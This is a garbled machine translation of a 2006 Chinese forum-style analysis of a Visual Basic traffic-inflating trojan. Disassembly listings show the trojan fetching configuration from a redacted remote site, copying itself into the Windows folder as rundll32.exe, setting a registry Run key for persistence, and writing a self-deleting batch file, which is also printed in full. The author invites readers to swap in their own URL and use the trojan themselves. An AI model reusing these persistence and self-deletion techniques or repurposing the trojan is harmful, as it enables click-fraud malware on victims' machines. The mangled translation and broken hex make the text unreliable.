A brush visits to the website of the pony analysis-vulnerability warning-the black bar safety net

2006-08-19T00:00:00
ID MYHACK58:62200611173
Type myhack58
Reporter 佚名
Modified 2006-08-19T00:00:00

Description

Article author: 混世魔王 Information source: evil octal information security team www.eviloctal.com)

System patch kick, online blind filling, and actually also in the network of the horse, ay. Now.... Put his net horse down down, 8 wrong, and genuine. Pass to kill 9 8. nt. 2 0 0 0. xp. XP SP2. 2 0 0 3. Keep, just to analyze his horse. A brush flow Trojans. Clothing. Now the ponies are out to this point. Shelling slightly, VB prepared. 00403DAD . FF15 5 4 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaHresu>; msvbvm60. vbaHresultCheckObj 00403DB3 . 8 9 8 5 E0FCFFFF MOV DWORD PTR SS:[EBP-3 2 0],EAX 00403DB9 . EB 0A JMP SHORT Rundll32. 00403DC5 00403DBB > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-3 2 0],0 00403DC5 > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0] 00403DCB . 8 9 9 5 F8FCFFFF MOV DWORD PTR SS:[EBP-3 0 8],EDX 00403DD1 . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0 00403DDB . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-3 0 8] 00403DE1 . 8 9 8 5 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX 00403DE7 . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8 00403DF1 . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4] 00403DF7 . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-1 0 8] 00403DFD . FF15 0 8 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaVarMo>; msvbvm60. vbaVarMove 00403E03 . C745 FC 0 6 0 0 0>MOV DWORD PTR SS:[EBP-4],6 00403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32. 0 0 4 0>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt" 00403E14 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-2 3 4],8 00403E1E . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-2 3 4] 00403E24 . 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-6 0] 00403E27 . FF15 7 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaVarCo>; msvbvm60. vbaVarCopy 00403E2D . C745 FC 0 7 0 0 0>MOV DWORD PTR SS:[EBP-4],7 00403E34 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32. 0 0 4 0>; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt" 00403E3E . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-2 3 4],8 00403E48 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-2 3 4] 00403E4E . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-9 4] 00403E54 . FF15 7 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaVarCo>; msvbvm60. vbaVarCopy 00403E5A . C745 FC 0 8 0 0 0>MOV DWORD PTR SS:[EBP-4],8 00403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32. 0 0 4 0>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp" 00403E6B . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-2 3 4],8 00403E75 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-2 3 4] 00403E7B . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-7 4] 00403E7E . FF15 7 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaVarCo>; msvbvm60. vbaVarCopy 00403E84 . C745 FC 0 9 0 0 0>MOV DWORD PTR SS:[EBP-4],9 00403E8B . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32. 0 0 4 0>; UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt" 00403E95 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-2 3 4],8 00403E9F . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-2 3 4] 00403EA5 . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-1 4 8] 00403EAB . FF15 7 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaVarCo>; msvbvm60. vbaVarCopy 00403EB1 . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A 00403EB8 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32. 0 0 4 0>; UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt" 00403EC2 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-2 3 4],8 00403ECC . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-2 3 4] 00403ED2 . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-8 4] 00403ED8 . FF15 7 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaVarCo>; msvbvm60. vbaVarCopy 00403EDE . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B 00403EE5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32. 0 0 4 0>; UNICODE "WinDir" 00403EEF . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-2 3 4],8 00403EF9 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-2 3 4] 00403EFF . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4] 00403F05 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60. vbaVarDu>; msvbvm60. vbaVarDup 00403F0B . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4] 00403F11 . 5 1 PUSH ECX 00403F12 . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4] 00403F18 . 5 2 PUSH EDX 00403F19 . FF15 6 0 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. rtcEnviron>; msvbvm60. rtcEnvironVar 00403F1F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32. 0 0 4 0>; the UNICODE "\rundll32.exe" 00403F29 . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-2 4 4],8

Program to http://www. xxxxxxxx. com. tc file to read the configuration file, while access to the tc/MMResult. asp

To generate the file 00404DA2 . /EB 0A JMP SHORT Rundll32. 00404DAE //get the file path to the stack 00404DA4 > |C785 88FCFFFF>MOV DWORD PTR SS:[EBP-3 7 8],0 00404DAE > \8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //my program path is "D:\fuck you" 00404DB4 . 5 0 PUSH EAX //the path into eax 00404DB5 . 6 8 8 0 2 7 4 0 0 0 PUSH Rundll32. 0 0 4 0 2 7 8 0 ; //generate killme. bat 00404DBA . FF15 4 8 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaStrCat>; msvbvm60. vbaStrCat 00404DC0 . 8BD0 MOV EDX,EAX //file path+file name D:\fuck you\killme. bat 00404DC2 . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4] 00404DC8 . FF15 8 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaStrMov>; msvbvm60. vbaStrMove 00404DCE . 5 0 PUSH EAX 00404DCF . 6A 0 1 PUSH 1 00404DD1 . 6A FF PUSH -1 00404DD3 . 6A 0 2 PUSH 2 00404DD5 . FF15 2 8 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaFileOp>; msvbvm60. vbaFileOpen 00404DDB . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4] 00404DE1 . 5 1 PUSH ECX 00404DE2 . 8D95 60FEFFFF LEA EDX,DWORD PTR SS:[EBP-1A0] 00404DE8 . 5 2 PUSH EDX 00404DE9 . 6A 0 2 PUSH 2 00404DEB . FF15 4 8 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaFreeSt>; msvbvm60. vbaFreeStrList 00404DF1 . 83C4 0C ADD ESP,0C 00404DF4 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0] 00404DFA . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60. vbaFreeOb>; msvbvm60. vbaFreeObj 00404E00 . C745 FC 2 3 0 0 0>MOV DWORD PTR SS:[EBP-4],2 3 00404E07 . 6 8 9C274000 PUSH Rundll32. 0040279C ; @echo off 00404E0C . 6A 0 1 PUSH 1 00404E0E . 6 8 B4274000 PUSH Rundll32. 004027B4 00404E13 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60. vbaPrintF>; msvbvm60. vbaPrintFile 00404E19 . 83C4 0C ADD ESP,0C 00404E1C . C745 FC 2 4 0 0 0>MOV DWORD PTR SS:[EBP-4],2 4 00404E23 . 6 8 BC274000 PUSH Rundll32. 004027BC ; sleep 1 0 0 00404E28 . 6A 0 1 PUSH 1 00404E2A . 6 8 B4274000 PUSH Rundll32. 004027B4 00404E2F . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60. vbaPrintF>; msvbvm60. vbaPrintFile 00404E35 . 83C4 0C ADD ESP,0C 00404E38 . C745 FC 2 5 0 0 0>MOV DWORD PTR SS:[EBP-4],2 5 00404E3F . 833D A8934000>CMP DWORD PTR DS:[4093A8],0 00404E46 . 7 5 1C JNZ SHORT Rundll32. 00404E64 00404E48 . 6 8 A8934000 PUSH Rundll32. 004093A8 00404E4D . 6 8 9 4 2 5 4 0 0 0 PUSH Rundll32. 0 0 4 0 2 5 9 4 00404E52 . FF15 3 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaNew2>] ; msvbvm60. vbaNew2 00404E58 . C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32. 0 0 4 0 9> 00404E62 . EB 0A JMP SHORT Rundll32. 00404E6E 00404E64 > C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32. 0 0 4 0 9> 00404E6E > 8B85 84FCFFFF MOV EAX,DWORD PTR SS:[EBP-37C] 00404E74 . 8B08 MOV ECX,DWORD PTR DS:[EAX] ........ 00404F1D . 5 2 PUSH EDX 00404F1E . FF15 5 4 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaHresul>; msvbvm60. vbaHresultCheckObj 00404F24 . 8 9 8 5 7CFCFFFF MOV DWORD PTR SS:[EBP-3 8 4],EAX 00404F2A . EB 0A JMP SHORT Rundll32. 00404F36 00404F2C > C785 7CFCFFFF>MOV DWORD PTR SS:[EBP-3 8 4],0 00404F36 > 6 8 D4274000 PUSH Rundll32. 004027D4 ; del 00404F3B . 8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //program file name 00404F41 . 5 0 PUSH EAX //the file name into the stack rundll322) 00404F42 . 6 8 E4274000 PUSH Rundll32. 004027E4 ; . exe (rundll322.exe) 00404F47 . FF15 4 8 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaStrCat>; msvbvm60. vbaStrCat 00404F4D . 8BD0 MOV EDX,EAX 00404F4F . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4] 00404F55 . FF15 8 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaStrMov>; msvbvm60. vbaStrMove 00404F5B . 5 0 PUSH EAX 00404F5C . FF15 4 8 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaStrCat>; msvbvm60. vbaStrCat 00404F62 . 8BD0 MOV EDX,EAX //del rundll322.exe) 00404F64 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8] 00404F6A . FF15 8 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaStrMov>; msvbvm60. vbaStrMove 00404F70 . 5 0 PUSH EAX 00404F71 . 6A 0 1 PUSH 1 00404F73 . 6 8 B4274000 PUSH Rundll32. 004027B400404F78 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60. vbaPrintF>; msvbvm60. vbaPrintFile 00404F7E . 83C4 0C ADD ESP,0C 00404F81 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8] 00404F87 . 5 1 PUSH ECX 00404F88 . 8D95 5CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1A4] 00404F8E . 5 2 PUSH EDX 00404F8F . 8D85 60FEFFFF LEA EAX,DWORD PTR SS:[EBP-1A0] 00404F95 . 5 0 PUSH EAX 00404F96 . 6A 0 3 PUSH 3 00404F98 . FF15 4 8 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaFreeSt>; msvbvm60. vbaFreeStrList 00404F9E . 83C4 1 0 ADD ESP,1 0 00404FA1 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0] 00404FA7 . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60. vbaFreeOb>; msvbvm60. vbaFreeObj 00404FAD . C745 FC 2 6 0 0 0>MOV DWORD PTR SS:[EBP-4],2 6 00404FB4 . 6 8 F4274000 PUSH Rundll32. 004027F4 ; del killme. bat 00404FB9 . 6A 0 1 PUSH 1 00404FBB . 6 8 B4274000 PUSH Rundll32. 004027B4 00404FC0 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60. vbaPrintF>; msvbvm60. vbaPrintFile 00404FC6 . 83C4 0C ADD ESP,0C 00404FC9 . C745 FC 2 7 0 0 0>MOV DWORD PTR SS:[EBP-4],2 7 00404FD0 . 6 8 1 8 2 8 4 0 0 0 PUSH Rundll32. 0 0 4 0 2 8 1 8 ; cls 00404FD5 . 6A 0 1 PUSH 1 00404FD7 . 6 8 B4274000 PUSH Rundll32. 004027B4 00404FDC . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60. vbaPrintF>; msvbvm60. vbaPrintFile 00404FE2 . 83C4 0C ADD ESP,0C 00404FE5 . C745 FC 2 8 0 0 0>MOV DWORD PTR SS:[EBP-4],2 8 00404FEC . 6 8 2 4 2 8 4 0 0 0 PUSH Rundll32. 0 0 4 0 2 8 2 4 ; exit 00404FF1 . 6A 0 1 PUSH 1 00404FF3 . 6 8 B4274000 PUSH Rundll32. 004027B4 00404FF8 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60. vbaPrintF>; msvbvm60. vbaPrintFile 00404FFE . 83C4 0C ADD ESP,0C 0 0 4 0 5 0 0 1 . C745 FC 2 9 0 0 0>MOV DWORD PTR SS:[EBP-4],2 9 0 0 4 0 5 0 0 8 . 6A 0 1 PUSH 1 0040500A . FF15 A4104000 CALL DWORD PTR DS:[<&msvbvm60. vbaFileCl>; msvbvm60. vbaFileClose 0 0 4 0 5 0 1 0 . C745 FC 2A000>MOV DWORD PTR SS:[EBP-4],2A 0 0 4 0 5 0 1 7 . 833D A8934000>CMP DWORD PTR DS:[4093A8],0 0040501E . 7 5 1C JNZ SHORT Rundll32. 0040503C 0 0 4 0 5 0 2 0 . 6 8 A8934000 PUSH Rundll32. 004093A8 0 0 4 0 5 0 2 5 . 6 8 9 4 2 5 4 0 0 0 PUSH Rundll32. 0 0 4 0 2 5 9 4

Generate batch delete records killme. bat echo off sleep 1 0 0 del rundll322.exe del killme. bat cls exit

Simply write to the registry run. 004046ED . BA 5C284000 MOV EDX,Rundll32. 0040285C ; software\microsoft\windows\currentversion\run 004046F2 . 8D8D 08FFFFFF LEA ECX,DWORD PTR SS:[EBP-F8] 004046F8 . FF15 4 0 1 1 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. vbaStrCop>; msvbvm60. vbaStrCopy 004046FE . C745 FC 1 7 0 0 0>MOV DWORD PTR SS:[EBP-4],1 7 0 0 4 0 4 7 0 5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32. 0 0 4 0 2>; windir 0040470F . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-2 3 4],8 0 0 4 0 4 7 1 9 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-2 3 4] 0040471F . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4] 0 0 4 0 4 7 2 5 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60. vbaVarDup>; msvbvm60. vbaVarDup 0040472B . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4] 0 0 4 0 4 7 3 1 . 5 2 PUSH EDX 0 0 4 0 4 7 3 2 . 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4] 0 0 4 0 4 7 3 8 . 5 0 PUSH EAX 0 0 4 0 4 7 3 9 . FF15 6 0 1 0 4 0 0 0 CALL DWORD PTR DS:[<&msvbvm60. rtcEnvironV>; msvbvm60. rtcEnvironVar 0040473F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32. 0 0 4 0 2>; \rundll32.exe

Given directly to the analysis of summarized it. Copyright BY. 混世魔王 QQ: 2 6 8 3 6 6 5 9 Program just to brush visits. There is nothing back door. Also it hides the URL. With XXXX Agency.

The program is running, your computer will access the http://www.xxxxxxxx.com/tc/MMResult.asp Look at the code <HTML><HEAD><TITLE>.& lt;/TITLE> <meta http-equiv="refresh" content="1; url=http://www. xxxx. net"> ‘address with xxx instead of the </HEAD><BODY> <script src='http://s47.cnzz.com/stat.php?id=223697&web_id=2 2 3 6 9 7' language='JavaScript' charset='gb2312'></script> ’the stationmaster of the station of the traffic statistics </BODY></HTML> Put their copy to c:/windows/ Will generate a batch delete a local directory to run the program. killme. bat echo off sleep 1 0 0 del rundll322.exe del killme. bat cls exit The program run is written to the registry software\microsoft\windows\currentversion\run 键 值 rundll32.exe The program is written bad, to be inserted into the process, and that the effect will be point. Just put he app in the URL modify the look of this Trojan can be their own use.

There is insufficient, also the Greek pointed out. Programming is very simple, but the technology was lost for so long, do not go cramming't write, there is no time to go to cramming the. Programming good, write a remember to pass me one. Huh. msn: hsmw26836659@hotmail.com